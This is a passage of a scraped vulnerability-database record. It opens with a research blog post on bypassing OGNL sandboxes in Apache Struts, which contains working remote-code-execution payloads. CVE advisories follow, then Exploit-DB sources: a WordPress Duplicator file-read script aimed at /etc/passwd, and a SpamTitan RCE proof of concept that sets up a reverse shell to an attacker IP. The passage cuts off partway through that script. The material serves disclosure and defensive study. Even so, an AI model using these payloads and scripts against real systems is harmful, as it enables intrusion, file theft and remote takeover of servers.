\n \n\n#### OgnlTool/OgnlUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#ognltool-ognlutil>)\n\nThe `org.apache.struts2.views.jsp.ui.OgnlTool` class was calling `Ognl.getValue()` with no `OgnlContext` and even though the Ognl library will take care of creating a default one, it will not include all the additional security checks added by the Struts framework and is easily bypassable:\n \n \n \n package org.apache.struts2.views.jsp.ui;\n \n import ognl.Ognl;\n \n import ognl.OgnlException;\n \n import com.opensymphony.xwork2.inject.Inject;\n \n public class OgnlTool {\n \n private OgnlUtil ognlUtil;\n \n public OgnlTool() { }\n \n \n \n @Inject\n \n public void setOgnlUtil(OgnlUtil ognlUtil) {\n \n this.ognlUtil = ognlUtil;\n \n }\n \n \n \n public Object findValue(String expr, Object context) {\n \n try {\n \n return Ognl.getValue(ognlUtil.compile(expr), context);\n \n } catch (OgnlException e) {\n \n return null;\n \n }\n \n }\n \n }\n \n \n\nWe can get an instance of `OgnlTool` from both FreeMarker and Velocity post-invocation contexts:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl')\n \n \n\nOr\n \n \n \n #request['.KEY_velocity.struts2.context'].internalGet('ognl')\n \n \n\nFor FreeMarker\u2019s case, it will come up wrapped with a Template model but we can just unwrap it and use it to get RCE:\n \n \n \n (#a=#request.get('.freemarker.Request').objectWrapper.unwrap(#request['.freemarker.TemplateModel'].get('ognl'),'org.apache.struts2.views.jsp.ui.OgnlTool'))+\n \n (#a.findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',null))\n \n \n\nOr, even simpler:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl').getWrappedObject().findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',{})\n \n \n\n`OgnlTool` was [inadvertently fixed](<https://github.com/apache/struts/commit/5cd409d382e00b190bfe4e957c4167d06b8f9da1#diff-55821720c975d84350d796bec09aa366cc2b2861fb7e12f223cc5a4453b55640>) when Struts 6.0.0 was released by upgrading to OGNL 3.2.2 which always requires a `MemberAccess`. But the latest Struts 2 version (2.5.30) is still vulnerable to this payload.\n\n#### StrutsUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#strutsutil>)\n\nAnother object that can be accessed in the post-invocation context is an instance of `org.apache.struts2.util.StrutsUtil`. There are plenty of interesting methods in here:\n\n * `public String include(Object aName)` can be used to read arbitrary resources \n * `<struts_utils>.include(\"/WEB-INF/web.xml\")`\n * `public Object bean(Object aName)` can be used to instantiate arbitrary types: \n * `<struts_utils>.bean(\"javax.script.ScriptEngineManager\")`\n * `public List makeSelectList(String selectedList, String list, String listKey, String listValue)`\n * `listKey` and `listValue` are evaluated with OgnlTool and therefore in an unsandboxed context\n * `<struts_utils>.makeSelectList(\"#this\",\"{'foo'}\",\"(new freemarker.template.utility.Execute()).exec({'touch /tmp/bbbb'})\",\"\")`\n\nOn applications using Velocity as its view layer, this object will be an instance of `VelocityStrutsUtil` which extends `StrutsUtils` and provides an additional vector:\n\n * `public String evaluate(String expression)` will allow us to evaluate a string containing a velocity template:\n \n \n \n (<struts_utils>.evaluate(\"#set ($cmd='java.lang.Runtime.getRuntime().exec(\\\"touch /tmp/pwned_velocity\\\")') $application['org.apache.tomcat.InstanceManager'].newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval($cmd)\"))\n \n \n\n#### JspApplicationContextImpl[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#jspapplicationcontextimpl>)\n\nThe last vector that I wanted to share is one that I found a few years ago and that I was not able to exploit\u2013although I was pretty sure that there had to be a way. New post-invocation discovered objects finally made this possible!\n\nIf you have inspected the Struts Servlet context (`#application`) in the past you probably saw an item with key `org.apache.jasper.runtime.JspApplicationContextImpl` which returned an instance of `org.apache.jasper.runtime.JspApplicationContextImpl`. This class contains a method called `getExpressionFactory()` that returns an Expression Factory that will expose a `createValueExpression()` method. This looks like a perfect place to create an EL expression and evaluate it. The problem was that `[createValueExpression](<https://docs.oracle.com/javaee/7/api/javax/el/ExpressionFactory.html#createValueExpression-javax.el.ELContext-java.lang.String-java.lang.Class->)` requires an instance of `ELContext` and we had none.\n\nFortunately, our post-invocation technique brought a new object into play. When using JSPs as the view layer, `#request['com.opensymphony.xwork2.dispatcher.PageContext']` will return an uninitialized `org.apache.jasper.runtime.PageContextImpl` instance that we can use to create an `ELContext` and evaluate arbitrary EL expressions:\n \n \n \n (#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke())+\n \n (#ctx=#request['com.opensymphony.xwork2.dispatcher.PageContext'])+\n \n (#jsp=#application['org.apache.jasper.runtime.JspApplicationContextImpl'])+\n \n (#elctx=#jsp.createELContext(#ctx))+\n \n (#jsp.getExpressionFactory().createValueExpression(#elctx, '7*7', @java.lang.Class@class).getValue(#elctx))\n \n \n\nThe avid readers may be wondering why Struts stores the `PageContext` in the request. Well, turns out, it does not, but we can access it through chained contexts.\n\nWhen accessing `#attr` (`AttributeMap`), [we can indirectly look into multiple scopes](<https://struts.apache.org/maven/struts2-core/apidocs/org/apache/struts2/util/AttributeMap.html>) such as the Page, Request, Session and Application (Servlet). But there is more, `org.apache.struts2.dispatcher.StrutsRequestWrapper.getAttribute()` will look for the attribute in the `ServletRequest`, if it can&#x27;t find it there, [it will search the value stack](<https://github.com/apache/struts/blob/master/core/src/main/java/org/apache/struts2/dispatcher/StrutsRequestWrapper.java#L94>)! So, we can effectively access the value stack through the `#request` or `#attr` variables.\n\nIn this case, the `PageContext` was not stored in the request scope, but in the Value stack, and we are able to access it through chained context searches.\n\nWe can even run arbitrary OGNL expressions as long as they don\u2019t contain any hashes (`#`), for example, `#request[\"@java.util.HashMap@class\"]` will return the `HashMap` class.\n\n### Leveling up the BeanMap payload[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#leveling-up-the-beanmap-payload>)\n\nYou may already be familiar with McOwn\u2019s [technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). He realized that it was possible to use [OGNL Map notation](<https://commons.apache.org/proper/commons-ognl/language-guide.html>) to instantiate an `org.apache.commons.collections.BeanMap` by using the `#@org.apache.commons.collections.BeanMap@{ }` syntax, and then it was possible to wrap any Java object on this map and access any getters and setters as map properties. His payload was based on the `org.apache.tomcat.InstanceManager` payload we introduced at [Black Hat 2020](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>) and looked like:\n \n \n \n (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n \n (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n \n (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))\n \n \n\nThe payload was basically disabling the OGNL sandbox and then accessing otherwise blocked classes such as `InstanceManager`. There is a simpler way to abuse BeanMaps that do not require to disable the sandbox and that is using reflection:\n \n \n \n (#c=#@org.apache.commons.beanutils.BeanMap@{})+\n \n (#c.setBean(@Runtime@class))+\n \n (#rt=#c['methods'][6].invoke())+\n \n (#c['methods'][12]).invoke(#rt,'touch /tmp/pwned')\n \n \n\nThis payload also works in Struts 6 if the `BeanClass` is available in the classpath (either from Apache Commons Collections or Apache Commons BeanUtils), but you need to specify the FQN (Fully Qualified Name) name for `Runtime`: `@java.lang.Runtime@class`.\n\n### Timeline[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#timeline>)\n\nThese bypasses were first reported to the Struts and OGNL security teams on June 9, 2022.\n\nOn October 7, 2022, the security team replied to us and stated that improving the block lists was not a sustainable solution, and, therefore, they decided to stop doing it. They highlighted that a [Java Security Manager can be configured](<https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable>) to protect every OGNL evaluation from these attacks and we highly recommend doing so if you are running a Struts application. However, bear in mind that the [Security Manager is deprecated](<https://openjdk.org/jeps/411>) and will soon get removed from the JDK.\n\n## That\u2019s a wrap[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#thats-a-wrap>)\n\nAt this point, you will have probably realized that sandboxing an expression language, such as OGNL, is a really difficult task, and may require maintaining a list of blocked classes and OGNL features even though that is not an optimal approach. In this blog post, we have reviewed a few ways in which these sandboxes can be bypassed. Although they are specific to OGNL, hopefully you have learned to explore sandbox controls\u2013and one or two new tricks\u2013that may apply to other sandboxes. In total, we were able to raise $5,600, which we donated to [UNHCR](<https://www.unhcr.org/>) to help provide refuge for Ukrainians seeking protection from the war.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-27T16:00:49", "type": "github", "title": "Bypassing OGNL sandboxes for fun and charities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3087", "CVE-2016-4436", "CVE-2017-5638", "CVE-2018-11776", "CVE-2018-1327", "CVE-2020-17530", "CVE-2021-26084", "CVE-2022-26134"], "modified": "2023-01-27T13:33:03", "id": "GITHUB:0519EA92487B44F364A1B35C85049455", "href": "https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "jvn": [{"lastseen": "2023-06-06T15:21:12", "description": "Apache Struts 2 provided by The Apache Software Foundation contains a remote code execution vulnerability due to improper input validation ([CWE-20](<https://cwe.mitre.org/data/definitions/20.html>)).\n\n ## Impact\n\nA remote attacker may execute arbitrary code.\n\n ## Solution\n\n**Update the software** \nUpdate the software to the latest version according to the information provided by the developer. \n \n**Apply the workaround** \nDo not use forced OGNL evaluation in the tag's attributes based on untrusted/unvalidated user input. \nThe developer reccomends the users to follow the recommendations from the [Security Guide](<https://struts.apache.org/security/#do-not-use-incoming-untrusted-user-input-in-forced-expression-evaluation>).\n\n ## Products Affected\n\n * Apache Struts 2.0.0 to 2.5.25\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "jvn", "title": "JVN#43969166: Apache Struts 2 vulnerable to remote code execution (S2-061)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-18T00:00:00", "id": "JVN:43969166", "href": "http://jvn.jp/en/jp/JVN43969166/index.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-04-11T01:35:21", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T22:51:56", "type": "osv", "title": "Remote code execution in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2023-04-11T01:35:18", "id": "OSV:GHSA-JC35-Q369-45PV", "href": "https://osv.dev/vulnerability/GHSA-jc35-q369-45pv", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-28T05:08:41", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-02T14:50:51", "type": "osv", "title": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-03-28T05:08:35", "id": "OSV:GHSA-WP4H-PVGW-5727", "href": "https://osv.dev/vulnerability/GHSA-wp4h-pvgw-5727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:25:45", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:30", "type": "osv", "title": "Expression Language Injection in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-04-11T01:25:42", "id": "OSV:GHSA-V8J6-6C2R-R27C", "href": "https://osv.dev/vulnerability/GHSA-v8j6-6c2r-r27c", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-06-07T13:50:22", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes,\nmay lead to remote code execution. Affected software : Apache Struts 2.0.0\n- Struts 2.5.25.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-11T00:00:00", "type": "ubuntucve", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-11T00:00:00", "id": "UB:CVE-2020-17530", "href": "https://ubuntu.com/security/CVE-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T13:46:24", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated\non raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T00:00:00", "type": "ubuntucve", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-09-14T00:00:00", "id": "UB:CVE-2019-0230", "href": "https://ubuntu.com/security/CVE-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-28T13:21:41", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts\n2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double\nevaluation if a developer applied forced OGNL evaluation by using the\n%{...} syntax. Using forced OGNL evaluation on untrusted user input can\nlead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "ubuntucve", "title": "CVE-2021-31805", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-04-12T00:00:00", "id": "UB:CVE-2021-31805", "href": "https://ubuntu.com/security/CVE-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2023-07-29T19:39:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-18T00:00:00", "type": "exploitdb", "title": "Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11738", "CVE-2020-11738"], "modified": "2021-10-18T00:00:00", "id": "EDB-ID:50420", "href": "https://www.exploit-db.com/exploits/50420", "sourceData": "# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read\r\n# Date: October 16, 2021\r\n# Exploit Author: nam3lum\r\n# Vendor Homepage: https://wordpress.org/plugins/duplicator/\r\n# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]\r\n# Version: 1.3.26\r\n# Tested on: Ubuntu 16.04\r\n# CVE : CVE-2020-11738\r\n\r\nimport requests as re\r\nimport sys\r\n\r\nif len(sys.argv) != 3:\r\n print(\"Exploit made by nam3lum.\")\r\n print(\"Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd\")\r\n exit()\r\n\r\narg = sys.argv[1]\r\nfile = sys.argv[2]\r\n\r\nURL = arg + \"/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../..\" + file\r\n\r\noutput = re.get(url = URL)\r\nprint(output.text)", "sourceHref": "https://www.exploit-db.com/raw/50420", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-21T22:46:15", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-05T00:00:00", "type": "exploitdb", "title": "SpamTitan 7.07 - Unauthenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-11698", "CVE-2020-11698"], "modified": "2020-10-05T00:00:00", "id": "EDB-ID:48856", "href": "https://www.exploit-db.com/exploits/48856", "sourceData": "# Exploit Title: SpamTitan 7.07 - Unauthenticated Remote Code Execution\r\n# Date: 2020-09-18\r\n# Exploit Author: Felipe Molina (@felmoltor)\r\n# Vendor Homepage: https://www.titanhq.com/spamtitan/spamtitangateway/\r\n# Software Link: https://www.titanhq.com/signup/?product_type=spamtitangateway\r\n# Version: 7.07\r\n# Tested on: FreeBSD\r\n# CVE : CVE-2020-11698\r\n\r\n---[SPUK-2020-09/SpamTitan Unauthenticated Remote Code Execution in\r\nsnmp-x.php]------------------------------\r\n\r\nSECURITY ADVISORY: SPUK-2020-09/SpamTitan Unauthenticated Remote\r\nCode Execution in snmp-x.php\r\nAffected Software: SpamTitan Gateway 7.07 (possibly earlier versions)\r\nVulnerability: Unauthenticated Remote Code Execution\r\nCVSSv3: 10.0\r\n(https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\r\nSeverity: Critical\r\nRelease Date: 2020-04-17\r\nCVE: CVE-2020-11698\r\n\r\nI. Background\r\n~~~~~~~~~~~~~\r\n\r\nFrom www.spamtitan.com:\r\n\r\n\"SpamTitan Gateway is a powerful Anti-Spam appliance that equips network\r\nadministrators with extensive tools to control mail flow and protect against\r\nunwanted email and malware.\"\r\n\r\nII. Description\r\n~~~~~~~~~~~~~~~\r\nImproper input sanitization of the parameter \"community\" on the page\r\nsnmp-x.php would allow a remote attacker to inject command directives into the\r\nfile snmpd.conf. This would allow executing commands on the target server by\r\nby injecting an \"extend\" or \"exec\" SNMPD directive and querying the snmp daemon\r\nof the server for the correct OID.\r\n\r\nIII. PoC\r\n~~~~~~~~\r\n\r\nUse python 3 and install the following modules: requests, pysnmp.\r\nIf your IP is 192.168.1.5 and the target SpamTitan server is\r\nspamtitan.example.com, call the PoC like this:\r\n./poc.py -t spamtitan.example.com -i 192.168.1.5\r\n\r\n---------------------------------------------\r\n\r\n#!/usr/bin/env python\r\n\r\n# Author: Felipe Molina (@felmoltor)\r\n# Date: 09/04/2020\r\n# Python Version: 3.7\r\n# Summary: This is PoC for an unauthenticated RCE 0day on SpamTitan\r\n7.07 and previous versions.\r\n# The script abuses of two weaknesses on the product:\r\n# 1. Unauthenticated interaction with snmp-x.php script\r\n# 2. Injection of snmpd.conf configuration directives in multiple POST\r\nparameters such as \"community\" or \"user_username\" of snmp-x.php\r\n# Product URL: https://www.spamtitan.com/\r\n# Product Version: 7.07 and probably previous\r\n\r\nimport requests\r\nrequests.packages.urllib3.disable_warnings()\r\nimport os\r\nimport threading\r\nfrom optparse import OptionParser\r\nimport socket\r\nimport json\r\nfrom pysnmp.hlapi import *\r\nfrom urllib.parse import urlparse\r\nfrom time import sleep\r\n\r\nSNMPGETDELAY=5\r\n\r\ndef parseoptions():\r\n parser = OptionParser()\r\n parser.add_option(\"-t\", \"--target\", dest=\"target\",\r\n help=\"Target SpamTitan URL to attack. E.g.:\r\nhttps://spamtitan.com/\", default=None)\r\n parser.add_option(\"-i\", \"--ip\", dest=\"ip\",\r\n help=\"Local IP where to listen for the reverse\r\nshell. Default: %s\" % myip(), default=myip())\r\n parser.add_option(\"-p\", \"--port\", dest=\"port\",\r\n help=\"Local Port where to listen for the reverse\r\nshell. Default: 4242\", default=4242)\r\n parser.add_option(\"-q\", \"--quiet\",\r\n action=\"store_true\", dest=\"quiet\", default=False,\r\n help=\"Shut up script! Just give me the 